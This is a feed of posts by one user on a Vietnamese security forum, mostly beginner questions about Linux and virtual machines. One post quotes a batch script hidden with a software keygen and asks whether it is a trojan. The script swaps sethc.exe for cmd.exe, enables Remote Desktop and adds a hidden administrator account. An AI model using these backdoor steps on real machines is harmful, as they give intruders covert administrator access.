<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Messages posted by "nhok09cntt2"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/listByUser/243432.hva</link>
		<description><![CDATA[Messages posted by "nhok09cntt2"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Nhờ các bác phân tích giùm con này</title>
				<description><![CDATA[ Hôm qua thằng bạn em nó gửi cho em phần mềm PowerISO qua mail 
xong rồi 1 lúc sau thấy nó điều khiển được máy tính của em luôn
Hỏi nó thì nó quăng cho đoạn code này
<blockquote>@echo off
start PowerISO-Keygen.exe
if exist sethc.exe.suriv goto else goto hack
:hack
TAKEOWN /F C:\windows\Sytem32\sethc.exe
TAKEOWN /F C:\windows\Sytem32\cmd.exe
reg add "HKEY_LOCAL_MACHINE\sYSTEM\Currentcontrolset\Control\Terminal Sever" /v fDenyTSconnections /t REG_DWORD /d "0" /f
net user su forever /add
net localgroup administrators su /add
cd /d C:\Windows\System32
icacls sethc.exe /grant administrators:F
icacls cmd.exe /grant administrators:F
rename sethc.exe sethc.exe.suriv
icals sethc.exe.suriv /dent adminitrators:F
copy cmd.exe sethc.exe /y
reg add "HKEY_LOCAL_MACHINE\Software\Micosoft\WindowsNT\currentVerison\Winlogon\SpecialAccounts\userList" /v SU /t REG_DWORD /d "0" /f
:exit
&nbsp;
		</blockquote>


Mình cứ thắc mắc k biết đây có phải là 1 con trojan thực sự không!
Nếu mà đây là trojan thì đoạn code trên như thế nào ạ

Ai hiểu được đoạn code này chỉ mình với!
Cảm ơn mọi người nhiều]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44734/275773.hva#275773</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44734/275773.hva#275773</link>
				<pubDate><![CDATA[Thu, 16 May 2013 14:17:18]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Bài dịch: How To Become A Hacker - 1</title>
				<description><![CDATA[ Khi đọc bài này em cảm thấy nó rất là khó đọc!
Khó là về hình thức, vì nó k dàn đều trang mà trải rộng ra khó đọc 1 cách liền mạch, k biết bác conmale có ý định thử thách nhỏ nhỏ này cho bọn em trước khi bọn em đọc xong cái bài này hay không nữa
Nhưng mà khó đọc quá]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/3994/268805.hva#268805</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/3994/268805.hva#268805</link>
				<pubDate><![CDATA[Sun, 26 Aug 2012 23:04:29]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>nhờ giúp đỡ về các công cụ và mộ trường phát triển phần mềm trên linux</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">panfider wrote:</cite><br>
		<blockquote>trên linux có gcc, bsd cũng xài trinh biên dịch này&nbsp;
		</blockquote>
bạn có thể trả lời rõ hơn giùm mình được không ạ?
mình mới tìm hiểu nên cũng không biết gì nhiều
cảm ơn bạn ha]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/40006/246711.hva#246711</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/40006/246711.hva#246711</link>
				<pubDate><![CDATA[Thu, 8 Sep 2011 14:25:37]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>nhờ giúp đỡ về các công cụ và mộ trường phát triển phần mềm trên linux</title>
				<description><![CDATA[ chào các bạn
hiện tại mình đang học môn công cụ và môi trường phát triển phần mềm
mình đang tìm hiểu về  công cụ và môi trường lập trình mã nguồn mở (các ngôn ngữ, công cụ...) và hệ điều hành Linux 
có ai có kinh nghiệm về linux và các công cụ cũng như môi trường phát triển phần mềm thì chỉ cho mình với ạ
mình cảm ơn nhiều lắm]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/40006/246637.hva#246637</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/40006/246637.hva#246637</link>
				<pubDate><![CDATA[Wed, 7 Sep 2011 21:05:35]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>xin cac bác tư vấn ....e đang mất phương hướng về cntt</title>
				<description><![CDATA[ ôi giời ơi bác ơi
bác không thấy bác commale đã nói rồi đó sao? giờ tư vấn cái gì nữa bác mới vừa lòng?
không lẽ bác định nhờ tư vấn là không học mà vẫn biết được 1 ngôn ngữ? hay là biết về cntt?
như bác commanle đã nói , không thể đốt cháy giai đoạn,kiến thức không thể nhồi nhét, hãy học đi 
bắt đầu từ giờ cũng chưa muộn
PS: nói với bác cũng như là nói với bản thân em vậy,  :-(  :-(  :-(  
hãy bắt đầu đi, học không bao giờ muộn
cố lên bác  :D  :D  :D  ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39827/245357.hva#245357</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39827/245357.hva#245357</link>
				<pubDate><![CDATA[Fri, 19 Aug 2011 07:53:43]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Cài đặt BackTrack 4 lên VMware</title>
				<description><![CDATA[ làm sao để có cái filw insstall như hình ảnh ạ
có ai có thể hướng dẫn thêm vài bước đầu nữa không?]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/34017/244914.hva#244914</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/34017/244914.hva#244914</link>
				<pubDate><![CDATA[Thu, 11 Aug 2011 05:05:08]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Lỗi khi cài CentOS</title>
				<description><![CDATA[ mình cũng cài centOS mà nó báo lỗi như thế này là sao hả mọi người
mong mọi người giúp em với ạ
http://www.youtube.com/watch?v=DriXTYMp2q0]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39423/244701.hva#244701</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39423/244701.hva#244701</link>
				<pubDate><![CDATA[Sun, 7 Aug 2011 06:36:26]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>nhờ giúp đỡ về giao diện của linux</title>
				<description><![CDATA[ cảm ơn tất cả mọi người  nhé
hi em biết là phải tìm hiểu rồi
nhưng mà k biết thì cứ hỏi đã, hi ít nhất em cũng biết là mình phải làm gì mà]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39704/244662.hva#244662</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39704/244662.hva#244662</link>
				<pubDate><![CDATA[Sat, 6 Aug 2011 09:05:16]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>nhờ giúp đỡ về giao diện của linux</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">vitcon01 wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">Stanley_00 wrote:</cite><br>
		<blockquote>Nếu thích dùng command line, bạn có thể làm quen qua chương trình Terminal thường có sẵn khi cài hệ điều hành.
Bạn cũng có thể nhấn Ctrl - Alt - F1 đến Ctrl - Alt - F9 để chuyển đổi giữa các giao diện.
Thân!&nbsp;
		</blockquote>
---&gt;nên tìm hiểu các Run levels, vì không phải distro nào cũng sẽ có phím tắt như trên!&nbsp;
		</blockquote>
bác nói rò hơn được k bác?]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39704/244516.hva#244516</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39704/244516.hva#244516</link>
				<pubDate><![CDATA[Wed, 3 Aug 2011 03:11:13]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>nhờ giúp đỡ về giao diện của linux</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">Stanley_00 wrote:</cite><br>
		<blockquote>Nếu thích dùng command line, bạn có thể làm quen qua chương trình Terminal thường có sẵn khi cài hệ điều hành.
Bạn cũng có thể nhấn Ctrl - Alt - F1 đến Ctrl - Alt - F9 để chuyển đổi giữa các giao diện.
Thân!&nbsp;
		</blockquote>
cảm ơn bác
em làm được rồi]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39704/244442.hva#244442</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39704/244442.hva#244442</link>
				<pubDate><![CDATA[Thu, 28 Jul 2011 23:37:50]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>nhờ giúp đỡ về giao diện của linux</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">tanviet12 wrote:</cite><br>
		<blockquote>Cẩn thận... chuyển qua rồi không biết gõ gì... rồi lại chuyển lại :D&nbsp;
		</blockquote>
bác này có vẻ khinh người nhỉ?
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39704/244438.hva#244438</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39704/244438.hva#244438</link>
				<pubDate><![CDATA[Thu, 28 Jul 2011 23:05:27]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>nhờ giúp đỡ về giao diện của linux</title>
				<description><![CDATA[ nhờ giúp đỡ về giao diện của linux
hiện tại mình đang dùng giao diện người dùng của linux
nhưng thấy thằng bạn nó dùng giao diên comand line pro quá
mình cũng muốn như vậy nhưng hỏi nó thì nó nói là cái đã như vậy rồi, có ai giúp mình với, mình muốn chuyển đổi từ giao diện người dùng qua commad line và lúc cần thì có thể chuyển ngược lại
mình xin chân thành cảm ơn ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39704/244394.hva#244394</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39704/244394.hva#244394</link>
				<pubDate><![CDATA[Thu, 28 Jul 2011 09:37:55]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>hỏi về máy ảo vmware</title>
				<description><![CDATA[ cái này phải vào máy ảo chỉnh lại độ phân giải màn hình
hình như là 1024x.....
chỉnh lại như vậy là ok]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/33782/244237.hva#244237</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/33782/244237.hva#244237</link>
				<pubDate><![CDATA[Tue, 26 Jul 2011 09:40:33]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Cấu hình DNS trong mạng LAN</title>
				<description><![CDATA[ cho em hỏi thế nào là lookup ạ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39669/244084.hva#244084</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39669/244084.hva#244084</link>
				<pubDate><![CDATA[Mon, 25 Jul 2011 01:03:17]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>đổi giao diện window 7 từ tiếng Pháp sang tiếng Việt</title>
				<description><![CDATA[ trên trang chủ của microsoft có bản gói cài đặt tiếng việt cho win7 kìa
cài về rồi cài đặt thôi mà]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/36169/243997.hva#243997</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/36169/243997.hva#243997</link>
				<pubDate><![CDATA[Sat, 23 Jul 2011 08:02:47]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Sử dụng command.exe</title>
				<description><![CDATA[ bác nói rõ hơn ý nghĩa của chúng được k?
em mù tịt 
cảm ơn bác]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/3012/243995.hva#243995</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/3012/243995.hva#243995</link>
				<pubDate><![CDATA[Sat, 23 Jul 2011 07:03:26]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Re: Share Full phần mềm diệt virus đỉnh cao: Kaspersky 7.0.1.273 !</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">hellangle wrote:</cite><br>
		<blockquote>Không nên dủng phần mềm lậu :D&nbsp;
		</blockquote>
hihi vẫn nên khi mà điều kiện tài chính chưa cho phép dùng hàng chính hãng
gần như 99% dân mình dùng đồ lậu]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/24015/243990.hva#243990</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/24015/243990.hva#243990</link>
				<pubDate><![CDATA[Sat, 23 Jul 2011 06:41:05]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Để trở thành hacker </title>
				<description><![CDATA[ hihi thấy bác conmale viết " xuyên qua bài viết" thấy vui vui tiếng Việt  mình là " thông qua bài viết" phải không ạ?
nói thật em học cntt nhưng em chưa thể tìm được cảm hứng, như là học toán hồi phổ thông ấy
hì hackker thì em không dám mơ đến, chỉ mong mình có thể hiểu được CNTT là cái gì thôi]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/35248/243741.hva#243741</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/35248/243741.hva#243741</link>
				<pubDate><![CDATA[Sun, 17 Jul 2011 22:57:00]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>làm thế nào để login vào server với quyền root trên Ubuntu?</title>
				<description><![CDATA[ lần đầu em mày mò linux 
em cài trên máy ảo win 7 
nhưng không vào mạng được bác à
bác có cách nào chỉ em với ạ
nếu có tài liệu nào hay về linux bác chỉ em với
trinh độ tiếng anh còn cùi bắp lắm nên k học được nhiều
nếu có bác gửi cho em qua mail nguyenthevuot09cntt2@gmail.com nhé
em cảm ơn bác nhiều]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/31702/243721.hva#243721</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/31702/243721.hva#243721</link>
				<pubDate><![CDATA[Sun, 17 Jul 2011 09:30:55]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>làm thế nào để login vào server với quyền root trên Ubuntu?</title>
				<description><![CDATA[ man ssh là gì vạy bác quanta]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/31702/243576.hva#243576</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/31702/243576.hva#243576</link>
				<pubDate><![CDATA[Fri, 15 Jul 2011 01:56:00]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
			<item>
				<title>Cần xin lời khuyên : Con đường IT của tôi là đúng hay sai ?</title>
				<description><![CDATA[ tôi cũng là dân 9x
tôi cũng đang học CNTT nhưng chỉ là cử nhân của 1 trường nhỏ
thật sự là tôi cũng chả biết vì sao mình vào học CNTT ở đâu nữa
thi đại học xong không đậu nguyên vọng 1 loay hoay tìm trường để đăng kí nguyện vọng 2, thấy trường này lấy có vẻ ít điểm nên đăng kí vào chẳng nghĩ ngợi gì cả
giờ thấy nó chẳng hợp với mình, nhưng chẳng thể nào bỏ được vì năm trước đó tôi cũng đã học ở 1 trường đại học vừa học vừa ôn thi nên giờ mà bỏ nữa thì chắc bố mẹ tôi giết tôi mất
đành cố gắng học, nhưng ai đời học năm 2 rồi mà lập trình c có thể nói là không thành thạo, mà nói thắng là không biết gì hết
có thể là tôi nhác, uhm công nhận là nhác thật nhưng chỉ với việc học này thôi
nhưng giờ làm sao tôi có thể đam mê đây
tôi thực sự chả biết làm sao nữa
đành học xong 4 năm kiếm tấm bằng rồi tính tiếp
biết làm sao giờ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39400/243253.hva#243253</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39400/243253.hva#243253</link>
				<pubDate><![CDATA[Mon, 11 Jul 2011 02:57:03]]> GMT</pubDate>
				<author><![CDATA[ nhok09cntt2]]></author>
			</item>
	</channel>
</rss>
